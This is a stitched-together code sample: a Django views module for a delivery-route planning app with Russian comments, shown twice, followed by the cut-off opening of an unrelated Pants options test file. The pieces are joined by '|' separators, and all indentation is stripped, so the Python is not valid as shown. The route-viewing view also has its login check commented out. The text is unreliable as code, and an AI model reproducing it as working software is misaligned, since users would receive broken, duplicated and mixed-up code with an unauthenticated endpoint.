gr_list.append((graph, f"Гр. {graph}"))
gr_list.sort(key = operator.itemgetter(0))
if not in_dictlist(gr_variant, gr_list): gr_variant = gr_list[0][0]
#Список рейсов для комбобокса
reis_list = []
for route in route_list.filter(graph=gr_variant):
reis_list.append((route.reis, f"Рейс {route.reis}"))
if not in_dictlist(reis_variant, reis_list): reis_variant = reis_list[0][0]
#поиск текущего выводимого маршрута
current_route = route_list.get(graph=gr_variant, reis=reis_variant)
#общая статистика
route_stat.costs = format_to_duration(route_stat.costs)
#автомобиль
if not current_route.dyn_auto: # Статический
real_auto = {
"name": current_route.get_auto().name,
"capacity": int(current_route.get_auto().capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(current_route.get_auto().driver_limit),
"used_driver_limit": format_to_time(current_route.get_auto().get_used_driver_limit()),
}
else: # Динамический
#Поиск времени работы водителя
first_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('reis')[0]
last_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('-reis')[0]
used_driver_limit = last_route.reis_start + last_route.get_all_time() - first_route.reis_start
real_auto = {
"name": f"Дин.авто ({current_route.graph})",
"capacity": int(route_stat.dyn_auto_capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(route_stat.dyn_auto_driver_limit),
"used_driver_limit": format_to_time(used_driver_limit),
}
#Статистика конкретного маршрута
reis_stat = {
"all_distance": format_to_km(current_route.get_all_distance()),
"all_time": format_to_duration(current_route.get_all_time_with_startwait()),
"delivery_dots_count": current_route.get_delivery_dots_count(),
}
#Маршрут
route_tpl = []
#добавление склада
store_wait_time = current_route.reis_start - current_route.get_start_time_with_startwait() #Ожидание выезда со склада
route_tpl.append({
'num': 1,
'name': f"{route_set.store.ns_code} {route_set.store.name}",
'address': route_set.store.address,
'distance': 0,
'latitude': route_set.store.latitude,
'longtitude': route_set.store.longtitude,
'time_in': format_to_time(current_route.reis_start),
'time_out': format_to_time(current_route.reis_start + current_route.load_time),
'wait_time': ('' if not store_wait_time else format_to_time(store_wait_time)),
'type': 'store'
})
#добавление магазинов
delivery_dots = RouteDot.objects.filter(route=current_route).order_by('num')
last_dot_num = 1
last_time_out = current_route.reis_start
last_coord = {'latitude': '', 'longtitude': ''}
for dot in delivery_dots:
dot_init = dot.get_init_dot()
dot_client = dot_init.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot_init.client_name}"
else:
client_name = dot_init.client_name
client_address = dot_client.address if dot_client else ''
dot_latitude = dot_init.latitude
dot_longtitude = dot_init.longtitude
if not dot_latitude or not dot_longtitude:
dot_latitude = dot_client.latitude
dot_longtitude = dot_client.longtitude
if not (last_coord['latitude'] == dot_latitude and last_coord['longtitude'] == dot_longtitude):
last_dot_num += 1 #С одинаковыми координатами считаем что точка та же самая
route_tpl.append({
'num': last_dot_num,
'name': client_name,
'address': client_address,
'distance': format_to_km(dot.distance),
'latitude': dot_latitude,
'longtitude': dot_longtitude,
'time_in': format_to_time(dot.time_in),
'time_out': format_to_time(dot.time_out),
'wait_time': ('' if not dot.wait_time else format_to_time(dot.wait_time)),
'type': 'client',
})
last_time_out = dot.time_out
last_coord = {'latitude': dot_latitude, 'longtitude': dot_longtitude}
#добавление склада в конец маршрута (если необходимо)
if route_stat.with_return:
store_dot = copy.deepcopy(route_tpl[0])
store_dot['num'] = 1
store_dot['distance'] = format_to_km(current_route.store_return_distance)
store_dot['time_in'] = format_to_time(last_time_out + current_route.store_return_time)
store_dot['time_out'] = ''
store_dot['wait_time'] = ''
route_tpl.append(store_dot)
#Нераспределенные точки
unallocated_dots = []
u_dots = route_set.get_unallocated_delivery_dots()
for dot in u_dots:
dot_client = dot.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot.client_name}"
else:
client_name = dot.client_name
client_address = dot_client.address if dot_client else ''
unallocated_dots.append({
'name': client_name,
'address': client_address,
'quantity': dot.quantity,
'window_in': format_to_time(dot.window_in),
'window_out': format_to_time(dot.window_out),
})
form = RouteForm(
initial={
'gr': gr_variant,
'reis': reis_variant,
'id': calc_id
},
gr_list=gr_list,
reis_list=reis_list
)
return render(request,
'main/viewroute.html',
context={'form': form,
'gr_list': gr_list,
'route_set': route_set,
'calculate_stat': route_stat,
'real_auto': real_auto,
'reis_stat': reis_stat,
'route': route_tpl,
'calc_id': calc_id,
'unallocated_dots': unallocated_dots,
})
#Новый расчет
def calcnew_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = CalcNewForm(request.POST, request.FILES)
if form.is_valid():
print(form.cleaned_data.get('store'))
if form.cleaned_data.get('auto_list') is not None:
print(f"{len(form.cleaned_data.get("auto_list"))} {form.cleaned_data.get("auto_list")}")
else:
print("No static auto")
print(f"{len(form.cleaned_data.get("clients_list"))} {form.cleaned_data.get("clients_list")}")
print(form.cleaned_data.get('dyn_auto_count_max'))
print(form.cleaned_data.get('dyn_auto_capacity'))
print(form.cleaned_data.get('dyn_auto_reis_max'))
print(form.cleaned_data.get('dyn_auto_driver_limit'))
try:
current_calc = RouteCalc(
request=request,
store_object=form.cleaned_data.get('store'),
auto_list=form.cleaned_data.get('auto_list'),
delivery_dots_list=form.cleaned_data.get('clients_list'),
dyn_auto={
"count_max": form.cleaned_data.get('dyn_auto_count_max'),
"capacity": form.cleaned_data.get('dyn_auto_capacity'),
"reis_max": form.cleaned_data.get('dyn_auto_reis_max'),
"driver_limit": form.cleaned_data.get('dyn_auto_driver_limit'),
},
params={
"with_return": form.cleaned_data.get('with_return'),
"high_accuracy": form.cleaned_data.get('high_accuracy'),
"auto_min": form.cleaned_data.get('auto_min'),
"early_arrival": form.cleaned_data.get('early_arrival'),
"lately_arrival": form.cleaned_data.get('lately_arrival'),
}
)
calc_id = current_calc.calculate_and_save()
response = redirect('main:viewroute')
response['Location'] += f"?id={calc_id}"
return response
except ValueError as e:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка расчета: {str(e)}")
else:
messages.error(request, f"Ошибка загрузки!")
else:
form = CalcNewForm
return render(request,
'main/calcnew.html',
context={'form': form}
)
#История расчетов
def calclist_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
filter_user = request.GET.get('filter_user', '')
if not any(filter_user == single_choice[0] for single_choice in CALCLIST_USERFILTER_CHOICES):
filter_user = CALCLIST_USERFILTER_CHOICES[0][0]
form = CalcListForm(initial={'filter_user': filter_user})
if filter_user == 'all':
route_sets = RouteSet.objects.all().order_by('-id')
else:
route_sets = RouteSet.objects.filter(username=request.user).order_by('-id')
paginator = Paginator(route_sets, 10, allow_empty_first_page=True)
page = request.GET.get('page')
route_sets = paginator.get_page(page)
return render(
request=request,
template_name='main/calclist.html',
context={
'route_sets': route_sets,
'form': form,
}
)
#Импорт из excel в бд
def import_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = ImportFileForm(request.POST,
request.FILES)
if form.is_valid():
map_dicts = {
'Client': ["ns_code", "name", "latitude", "longtitude", "address",],
'Store': ["ns_code", "name", "latitude", "longtitude", "address",],
}
import_table = form.cleaned_data.get('table')
if import_table not in map_dicts:
messages.error(request, f"Загрузка таблицы не предусмотрена!")
return redirect("main:import")
#проверка доступа
if not request.user.is_staff:
if import_table != 'Client':
messages.error(request, f"Вам разрешена загрузка только контрагентов!")
return redirect("main:import")
if form.cleaned_data.get('rewrite'):
messages.error(request, f"Вам разрешена только загрузка без перезаписи!")
return redirect("main:import")
try:
import_model = apps.get_model('main', import_table)
def filter_func(rows):
rows = list(rows)
#Проверка на первую колонку (в ней пишется тип того, что импортируем)
if rows[0].replace('\t', '').lower() != import_table.lower():
raise ValueError('Неправильный тип файла (проблема с 1 колонкой)')
else:
del rows[0]
#Проверка на пустые координаты
if not rows[2] or not rows[3]:
messages.error(request, f'Обьект не был загружен из-за пустых координат: {rows[0]} {rows[1]}')
return
# Переписывать ли имеющиеся строки
if form.cleaned_data.get('rewrite'):
import_model.objects.filter(ns_code=rows[0]).delete()
else:
try: #Если запись найдена - убираем строку из импорта
import_model.objects.get(ns_code=rows[0])
return
except:
pass
for idx, row in enumerate(rows):
# Фильтр названий
rows[idx] = filter_string(rows[idx])
return rows
request.FILES['file'].save_to_database(
start_row=1,
#name_columns_by_row=2,
bulk_size=256,
initializer=filter_func,
model=import_model,
mapdict=map_dicts[import_table]
)
messages.success(request, f"Импорт успешен!")
response = redirect('main:map')
response['Location'] += '?table=' + import_table.lower()
return response
except:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка: Неверный формат файла!")
return redirect("main:import")
else:
messages.error(request, f"Ошибка загрузки!")
return redirect("main:import")
form = ImportFileForm
return render(request,
'main/import.html',
context={'form': form}
)
def map_request(request):
#Какие объекты необходимо отображать на карте
map_variant = request.GET.get('table', '').capitalize()
if not any(map_variant == single_choice[0] for single_choice in TABLE_CHOICES):
map_variant = TABLE_CHOICES[0][0]
points = apps.get_model('main', map_variant).objects.filter(latitude__gt=0).filter(longtitude__gt=0)
form = MapForm(initial={'table': map_variant})
return render(request,
'main/map.html',
{'form': form,
'points': points,
'map_variant': map_variant.lower(),
})
# def register(request):
# if request.method == "POST":
# form = NewUserForm(request.POST)
# if form.is_valid():
# user = form.save()
# username = form.cleaned_data.get("username")
# messages.success(request, f"Пользователь успешно зарегистрирован: {username}")
# login(request, user)
# messages.info(request, f"Вход под пользователем {username}")
# return redirect("main:homepage")
# else:
# for msg in form.error_messages:
# messages.error(request, f"Ошибка {msg}:{form.error_messages[msg]}")
#
# form = NewUserForm
# return render(request,
# 'main/register.html',
# context={'form': form}
# )
def logout_request(request):
logout(request)
messages.info(request, "Выход из учетной записи: успешно")
return redirect("main:homepage")
def login_request(request):
if request.method == "POST":
form = AuthenticationForm(request, request.POST)
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.info(request, f"Вход под пользователем {username}")
return redirect("main:homepage")
messages.error(request, 'Неверно введен логин или пароль')
form = AuthenticationForm
return render(request,
'main/login.html',
context={'form': form}
)
| from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth.forms import AuthenticationForm
from .forms import *
from django.contrib.auth import login, logout, authenticate
from django.contrib import messages
from django.apps import apps
from django.conf import settings
from django.core.paginator import Paginator
import json
import operator
from django.db.models import Q
from .route import RouteCalc, format_to_time, format_to_km, output_result_db_to_csv, format_to_duration
import os
import copy
# #Главная
# def homepage(request):
# #return HttpResponse("Test response")
# return render(request=request,
# template_name='main/home.html',
# context={'AccLogs': AccessLog.objects.all()}
# )
#Ajax запрос списка складов с их кодами
def ajax_getStores(request):
results = {}
if request.is_ajax():
def get_res_store():
q = request.GET.get('term', '')
if not q:
return
search_qs = Store.objects.filter(Q(name__icontains=q) | Q(ns_code__icontains=q))[:5]
for r in search_qs:
results[f"{r.ns_code} {r.name}"] = ''
return results
results = get_res_store()
data = json.dumps(results)
return HttpResponse(data, 'application/json')
#Сохранение маршрута в файл
def saveroute_request(route_set, file_format):
if file_format != 'csv':
return redirect("main:homepage")
filepath = output_result_db_to_csv(route_set)
filew = open(filepath,"rb")
response = HttpResponse(filew.read(), content_type='text/csv')
response['Content-Disposition'] = f'attachment; filename="{route_set.get_short_desc()}.csv"'
filew.close()
os.remove(filepath)
return response
#Просмотр маршрута
def viewroute_request(request):
# if not request.user.is_authenticated:
# return redirect("main:login")
try:
calc_id = int(request.GET.get('id', ''))
gr_variant = int(request.GET.get('gr', 0))
reis_variant = int(request.GET.get('reis', 0))
save_request = request.GET.get('save', '')
route_set = RouteSet.objects.get(id=calc_id)
route_stat = RouteStat.objects.get(route_set=route_set)
except:
messages.error(request, "Неверная ссылка на расчет!")
return redirect("main:homepage")
if not route_stat.reis_count: # Пустой расчет
return render(
request,
'main/message.html',
context={'page_title': 'Пустой расчет',
'msg_title': 'Пустой расчет',
'msg_body': '<h5><p>Расчет не удался.<br>' +
'Попробуйте указать менее строгие параметры расчета</p></h5>' +
f'<p>{route_set}</p>',
})
def in_dictlist(val, dict):
for key, dval in dict:
if key == val: return True
return False
if save_request:
return saveroute_request(route_set, save_request)
#список графиков для комбобокса
route_list = Route.objects.filter(route_set=route_set)
gr_list = []
for graph in route_list.values_list('graph', flat=True).distinct():
gr_list.append((graph, f"Гр. {graph}"))
gr_list.sort(key = operator.itemgetter(0))
if not in_dictlist(gr_variant, gr_list): gr_variant = gr_list[0][0]
#Список рейсов для комбобокса
reis_list = []
for route in route_list.filter(graph=gr_variant):
reis_list.append((route.reis, f"Рейс {route.reis}"))
if not in_dictlist(reis_variant, reis_list): reis_variant = reis_list[0][0]
#поиск текущего выводимого маршрута
current_route = route_list.get(graph=gr_variant, reis=reis_variant)
#общая статистика
route_stat.costs = format_to_duration(route_stat.costs)
#автомобиль
if not current_route.dyn_auto: # Статический
real_auto = {
"name": current_route.get_auto().name,
"capacity": int(current_route.get_auto().capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(current_route.get_auto().driver_limit),
"used_driver_limit": format_to_time(current_route.get_auto().get_used_driver_limit()),
}
else: # Динамический
#Поиск времени работы водителя
first_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('reis')[0]
last_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('-reis')[0]
used_driver_limit = last_route.reis_start + last_route.get_all_time() - first_route.reis_start
real_auto = {
"name": f"Дин.авто ({current_route.graph})",
"capacity": int(route_stat.dyn_auto_capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(route_stat.dyn_auto_driver_limit),
"used_driver_limit": format_to_time(used_driver_limit),
}
#Статистика конкретного маршрута
reis_stat = {
"all_distance": format_to_km(current_route.get_all_distance()),
"all_time": format_to_duration(current_route.get_all_time_with_startwait()),
"delivery_dots_count": current_route.get_delivery_dots_count(),
}
#Маршрут
route_tpl = []
#добавление склада
store_wait_time = current_route.reis_start - current_route.get_start_time_with_startwait() #Ожидание выезда со склада
route_tpl.append({
'num': 1,
'name': f"{route_set.store.ns_code} {route_set.store.name}",
'address': route_set.store.address,
'distance': 0,
'latitude': route_set.store.latitude,
'longtitude': route_set.store.longtitude,
'time_in': format_to_time(current_route.reis_start),
'time_out': format_to_time(current_route.reis_start + current_route.load_time),
'wait_time': ('' if not store_wait_time else format_to_time(store_wait_time)),
'type': 'store'
})
#добавление магазинов
delivery_dots = RouteDot.objects.filter(route=current_route).order_by('num')
last_dot_num = 1
last_time_out = current_route.reis_start
last_coord = {'latitude': '', 'longtitude': ''}
for dot in delivery_dots:
dot_init = dot.get_init_dot()
dot_client = dot_init.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot_init.client_name}"
else:
client_name = dot_init.client_name
client_address = dot_client.address if dot_client else ''
dot_latitude = dot_init.latitude
dot_longtitude = dot_init.longtitude
if not dot_latitude or not dot_longtitude:
dot_latitude = dot_client.latitude
dot_longtitude = dot_client.longtitude
if not (last_coord['latitude'] == dot_latitude and last_coord['longtitude'] == dot_longtitude):
last_dot_num += 1 #С одинаковыми координатами считаем что точка та же самая
route_tpl.append({
'num': last_dot_num,
'name': client_name,
'address': client_address,
'distance': format_to_km(dot.distance),
'latitude': dot_latitude,
'longtitude': dot_longtitude,
'time_in': format_to_time(dot.time_in),
'time_out': format_to_time(dot.time_out),
'wait_time': ('' if not dot.wait_time else format_to_time(dot.wait_time)),
'type': 'client',
})
last_time_out = dot.time_out
last_coord = {'latitude': dot_latitude, 'longtitude': dot_longtitude}
#добавление склада в конец маршрута (если необходимо)
if route_stat.with_return:
store_dot = copy.deepcopy(route_tpl[0])
store_dot['num'] = 1
store_dot['distance'] = format_to_km(current_route.store_return_distance)
store_dot['time_in'] = format_to_time(last_time_out + current_route.store_return_time)
store_dot['time_out'] = ''
store_dot['wait_time'] = ''
route_tpl.append(store_dot)
#Нераспределенные точки
unallocated_dots = []
u_dots = route_set.get_unallocated_delivery_dots()
for dot in u_dots:
dot_client = dot.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot.client_name}"
else:
client_name = dot.client_name
client_address = dot_client.address if dot_client else ''
unallocated_dots.append({
'name': client_name,
'address': client_address,
'quantity': dot.quantity,
'window_in': format_to_time(dot.window_in),
'window_out': format_to_time(dot.window_out),
})
form = RouteForm(
initial={
'gr': gr_variant,
'reis': reis_variant,
'id': calc_id
},
gr_list=gr_list,
reis_list=reis_list
)
return render(request,
'main/viewroute.html',
context={'form': form,
'gr_list': gr_list,
'route_set': route_set,
'calculate_stat': route_stat,
'real_auto': real_auto,
'reis_stat': reis_stat,
'route': route_tpl,
'calc_id': calc_id,
'unallocated_dots': unallocated_dots,
})
#Новый расчет
def calcnew_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = CalcNewForm(request.POST, request.FILES)
if form.is_valid():
print(form.cleaned_data.get('store'))
if form.cleaned_data.get('auto_list') is not None:
print(f"{len(form.cleaned_data.get('auto_list'))} {form.cleaned_data.get('auto_list')}")
else:
print("No static auto")
print(f"{len(form.cleaned_data.get('clients_list'))} {form.cleaned_data.get('clients_list')}")
print(form.cleaned_data.get('dyn_auto_count_max'))
print(form.cleaned_data.get('dyn_auto_capacity'))
print(form.cleaned_data.get('dyn_auto_reis_max'))
print(form.cleaned_data.get('dyn_auto_driver_limit'))
try:
current_calc = RouteCalc(
request=request,
store_object=form.cleaned_data.get('store'),
auto_list=form.cleaned_data.get('auto_list'),
delivery_dots_list=form.cleaned_data.get('clients_list'),
dyn_auto={
"count_max": form.cleaned_data.get('dyn_auto_count_max'),
"capacity": form.cleaned_data.get('dyn_auto_capacity'),
"reis_max": form.cleaned_data.get('dyn_auto_reis_max'),
"driver_limit": form.cleaned_data.get('dyn_auto_driver_limit'),
},
params={
"with_return": form.cleaned_data.get('with_return'),
"high_accuracy": form.cleaned_data.get('high_accuracy'),
"auto_min": form.cleaned_data.get('auto_min'),
"early_arrival": form.cleaned_data.get('early_arrival'),
"lately_arrival": form.cleaned_data.get('lately_arrival'),
}
)
calc_id = current_calc.calculate_and_save()
response = redirect('main:viewroute')
response['Location'] += f"?id={calc_id}"
return response
except ValueError as e:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка расчета: {str(e)}")
else:
messages.error(request, f"Ошибка загрузки!")
else:
form = CalcNewForm
return render(request,
'main/calcnew.html',
context={'form': form}
)
#История расчетов
def calclist_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
filter_user = request.GET.get('filter_user', '')
if not any(filter_user == single_choice[0] for single_choice in CALCLIST_USERFILTER_CHOICES):
filter_user = CALCLIST_USERFILTER_CHOICES[0][0]
form = CalcListForm(initial={'filter_user': filter_user})
if filter_user == 'all':
route_sets = RouteSet.objects.all().order_by('-id')
else:
route_sets = RouteSet.objects.filter(username=request.user).order_by('-id')
paginator = Paginator(route_sets, 10, allow_empty_first_page=True)
page = request.GET.get('page')
route_sets = paginator.get_page(page)
return render(
request=request,
template_name='main/calclist.html',
context={
'route_sets': route_sets,
'form': form,
}
)
#Импорт из excel в бд
def import_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = ImportFileForm(request.POST,
request.FILES)
if form.is_valid():
map_dicts = {
'Client': ["ns_code", "name", "latitude", "longtitude", "address",],
'Store': ["ns_code", "name", "latitude", "longtitude", "address",],
}
import_table = form.cleaned_data.get('table')
if import_table not in map_dicts:
messages.error(request, f"Загрузка таблицы не предусмотрена!")
return redirect("main:import")
#проверка доступа
if not request.user.is_staff:
if import_table != 'Client':
messages.error(request, f"Вам разрешена загрузка только контрагентов!")
return redirect("main:import")
if form.cleaned_data.get('rewrite'):
messages.error(request, f"Вам разрешена только загрузка без перезаписи!")
return redirect("main:import")
try:
import_model = apps.get_model('main', import_table)
def filter_func(rows):
rows = list(rows)
#Проверка на первую колонку (в ней пишется тип того, что импортируем)
if rows[0].replace('\t', '').lower() != import_table.lower():
raise ValueError('Неправильный тип файла (проблема с 1 колонкой)')
else:
del rows[0]
#Проверка на пустые координаты
if not rows[2] or not rows[3]:
messages.error(request, f'Обьект не был загружен из-за пустых координат: {rows[0]} {rows[1]}')
return
# Переписывать ли имеющиеся строки
if form.cleaned_data.get('rewrite'):
import_model.objects.filter(ns_code=rows[0]).delete()
else:
try: #Если запись найдена - убираем строку из импорта
import_model.objects.get(ns_code=rows[0])
return
except:
pass
for idx, row in enumerate(rows):
# Фильтр названий
rows[idx] = filter_string(rows[idx])
return rows
request.FILES['file'].save_to_database(
start_row=1,
#name_columns_by_row=2,
bulk_size=256,
initializer=filter_func,
model=import_model,
mapdict=map_dicts[import_table]
)
messages.success(request, f"Импорт успешен!")
response = redirect('main:map')
response['Location'] += '?table=' + import_table.lower()
return response
except:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка: Неверный формат файла!")
return redirect("main:import")
else:
messages.error(request, f"Ошибка загрузки!")
return redirect("main:import")
form = ImportFileForm
return render(request,
'main/import.html',
context={'form': form}
)
def map_request(request):
#Какие объекты необходимо отображать на карте
map_variant = request.GET.get('table', '').capitalize()
if not any(map_variant == single_choice[0] for single_choice in TABLE_CHOICES):
map_variant = TABLE_CHOICES[0][0]
points = apps.get_model('main', map_variant).objects.filter(latitude__gt=0).filter(longtitude__gt=0)
form = MapForm(initial={'table': map_variant})
return render(request,
'main/map.html',
{'form': form,
'points': points,
'map_variant': map_variant.lower(),
})
# def register(request):
# if request.method == "POST":
# form = NewUserForm(request.POST)
# if form.is_valid():
# user = form.save()
# username = form.cleaned_data.get("username")
# messages.success(request, f"Пользователь успешно зарегистрирован: {username}")
# login(request, user)
# messages.info(request, f"Вход под пользователем {username}")
# return redirect("main:homepage")
# else:
# for msg in form.error_messages:
# messages.error(request, f"Ошибка {msg}:{form.error_messages[msg]}")
#
# form = NewUserForm
# return render(request,
# 'main/register.html',
# context={'form': form}
# )
def logout_request(request):
logout(request)
messages.info(request, "Выход из учетной записи: успешно")
return redirect("main:homepage")
def login_request(request):
if request.method == "POST":
form = AuthenticationForm(request, request.POST)
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.info(request, f"Вход под пользователем {username}")
return redirect("main:homepage")
messages.error(request, 'Неверно введен логин или пароль')
form = AuthenticationForm
return render(request,
'main/login.html',
context={'form': form}
)
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import os
import shlex
import unittest.mock
from enum import Enum
from functools import partial
from textwrap import dedent
from typing import Any, Dict, List, Optional, Union, cast
import toml
import yaml
from packaging.version import Version
from pants.base.deprecated import CodeRemovedError
from pants.base.hash_utils import CoercingEncoder
from pants.option.config import Config
from pants.option.custom_types import UnsetBool, file_option, shell_str, target_option
from pants.option.errors import (
BooleanConversionError,
BooleanOptionNameWithNo,
FromfileError,
ImplicitValIsNone,
InvalidKwarg,
InvalidMemberType,
MemberTypeNotAllowed,
MutuallyExclusiveOptionError,
NoOptionNames,
OptionAlreadyRegistered,
OptionNameDash,
OptionNameDoubleDash,
ParseError,
RecursiveSubsystemOption,
Shadowing,
)
from pants.option.global_options import GlobalOptions
from pants.option.optionable import Optionable
from pants.option.options import Options
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.parser import Parser
from pants.option.ranked_value import Rank, RankedValue
from pants.option.scope import GLOBAL_SCOPE, ScopeInfo
from pants.testutil.option.fakes import create_options
from pants.testutil.test_base import TestBase
from pants.util.collections import assert_single_element
from pants.util.contextutil import temporary_file, temporary_file_path
from pants.util.dirutil import safe_mkdtemp
from pants.util.strutil import safe_shlex_join
_FAKE_CUR_VERSION = "1.0.0.dev0"
def global_scope() -> ScopeInfo:
return ScopeInfo(GLOBAL_SCOPE, ScopeInfo.GLOBAL, GlobalOptions)
def task(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.TASK)
def intermediate(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.INTERMEDIATE)
def subsystem(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.SUBSYSTEM)
class OptionsTest(TestBase):
@staticmethod
def _create_config(config: Optional[Dict[str, Dict[str, str]]] = None) -> Config:
with open(os.path.join(safe_mkdtemp(), "test_config.toml"), "w") as fp:
toml.dump(config or {}, fp)
return Config.load(config_paths=[fp.name])
def _parse(
self,
*,
flags: str = "",
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, Any]]] = None,
bootstrap_option_values=None,
) -> Options:
args = ["./pants", *shlex.split(flags)]
options = Options.create(
env=env or {},
config=self._create_config(config),
known_scope_infos=OptionsTest._known_scope_infos,
args=args,
bootstrap_option_values=bootstrap_option_values,
)
self._register(options)
return options
_known_scope_infos = [
global_scope(),
intermediate("compile"),
task("compile.java"),
task("compile.scala"),
task("cache.compile.scala"),
intermediate("stale"),
intermediate("test"),
task("test.junit"),
subsystem("passconsumer"),
task("simple"),
task("simple-dashed"),
task("scoped.a.bit"),
task("scoped.and-dashed"),
task("fromfile"),
task("fingerprinting"),
task("enum-opt"),
task("separate-enum-opt-scope"),
]
class SomeEnumOption(Enum):
a_value = "a-value"
another_value = "another-value"
def _register(self, options):
def register_global(*args, **kwargs):
options.register(GLOBAL_SCOPE, *args, **kwargs)
register_global("-z", "--verbose", type=bool, help="Verbose output.", recursive=True)
register_global("-n", "--num", type=int, default=99, recursive=True, fingerprint=True)
register_global("--y", type=list, member_type=int)
register_global(
"--v2", help="Two-letter long-form option, used to test option name suggestions."
)
register_global("--config-override", type=list)
register_global("--pants-foo")
register_global("--bar-baz")
register_global("--store-true-flag", type=bool, fingerprint=True)
register_global("--store-false-flag", type=bool, implicit_value=False)
register_global("--store-true-def-true-flag", type=bool, default=True)
register_global("--store-true-def-false-flag", type=bool, default=False)
register_global(
"--store-false-def-false-flag", type=bool, implicit_value=False, default=False
)
register_global(
"--store-false-def-true-flag", type=bool, implicit_value=False, default=True
)
register_global("--def-unset-bool-flag", type=bool, default=UnsetBool)
# Choices.
register_global("--str-choices", choices=["foo", "bar"])
register_global("--int-choices", choices=[42, 99], type=list, member_type=int)
# Custom types.
register_global("--listy", type=list, member_type=int, default="[1, 2, 3]")
register_global("--dicty", type=dict, default='{"a": "b"}')
register_global(
"--dict-listy", type=list, member_type=dict, default='[{"a": 1, "b": 2}, {"c": 3}]'
)
register_global("--targety", type=target_option, default="//:a")
register_global(
"--target-listy", type=list, member_type=target_option, default=["//:a", "//:b"]
)
register_global("--filey", type=file_option, default=None)
register_global("--file-listy", type=list, member_type=file_option)
register_global(
"--shell-str-listy",
type=list,
member_type=shell_str,
default="--default1 --default2=test",
)
# Implicit value.
register_global("--implicit-valuey", default="default", implicit_value="implicit")
# For the design doc example test.
register_global("--a", type=int, recursive=True)
register_global("--b", type=int, recursive=True)
# Deprecated global options
register_global(
"--global-crufty",
removal_version="999.99.9.dev0",
removal_hint="use a less crufty global option",
)
register_global(
"--global-crufty-boolean",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="say no to crufty global options",
)
register_global(
"--global-delayed-deprecated-option",
removal_version="999.99.9.dev0",
deprecation_start_version="500.0.0.dev0",
)
register_global(
"--global-delayed-but-already-passed-deprecated-option",
removal_version="999.99.9.dev0",
deprecation_start_version=_FAKE_CUR_VERSION,
)
# Test that an option past the `removal_version` fails at option registration time.
with self.assertRaises(CodeRemovedError):
register_global(
"--global-crufty-expired",
removal_version="0.0.1.dev0",
removal_hint="use a less crufty global option",
)
# Mutual Exclusive options
register_global("--mutex-foo", mutually_exclusive_group="mutex")
register_global("--mutex-bar", mutually_exclusive_group="mutex")
register_global("--mutex-baz", mutually_exclusive_group="mutex")
register_global("--new-name")
register_global("--old-name", mutually_exclusive_group="new_name")
# For the design doc example test.
options.register("compile", "--c", type=int, recursive=True)
# Test deprecated options with a scope
options.register("stale", "--still-good")
options.register(
"stale",
"--crufty",
removal_version="999.99.9.dev0",
removal_hint="use a less crufty stale scoped option",
)
options.register(
"stale",
"--crufty-boolean",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="say no to crufty, stale scoped options",
)
# Test mutual exclusive options with a scope
options.register("stale", "--mutex-a", mutually_exclusive_group="crufty_mutex")
options.register("stale", "--mutex-b", mutually_exclusive_group="crufty_mutex")
options.register("stale", "--crufty-old", mutually_exclusive_group="crufty_new")
options.register("stale", "--crufty-new")
# For task identity test
options.register("compile.scala", "--modifycompile", fingerprint=True)
options.register("compile.scala", "--modifylogs")
options.register(
"compile.scala",
"--modifypassthrough",
fingerprint=True,
passthrough=True,
type=list,
member_type=str,
)
# For scoped env vars test
options.register("simple", "--spam")
options.register("simple-dashed", "--spam")
options.register("scoped.a.bit", "--spam")
options.register("scoped.and-dashed", "--spam")
# For fromfile test
options.register("fromfile", "--string")
options.register("fromfile", "--intvalue", type=int)
options.register("fromfile", "--dictvalue", type=dict)
options.register("fromfile", "--listvalue", type=list)
options.register("fromfile", "--appendvalue", type=list, member_type=int)
# For fingerprint tests
options.register("fingerprinting", "--inverted") # Implicitly: daemon=True
options.register("fingerprinting", "--definitely-not-inverted", daemon=False)
options.register("fingerprinting", "--fingerprinted", fingerprint=True)
options.register("fingerprinting", "--definitely-not-fingerprinted", fingerprint=False)
# For enum tests
options.register("enum-opt", "--some-enum", type=self.SomeEnumOption)
# For testing the default value
options.register(
"separate-enum-opt-scope",
"--some-enum-with-default",
default=self.SomeEnumOption.a_value,
type=self.SomeEnumOption,
)
def test_env_var_of_type_int(self) -> None:
    """Env var values are converted per the option's declared type (int and list-of-int)."""
    # Same bootstrap args/config for both cases; only the env differs.
    create_options_object = partial(
        Options.create,
        config=self._create_config(),
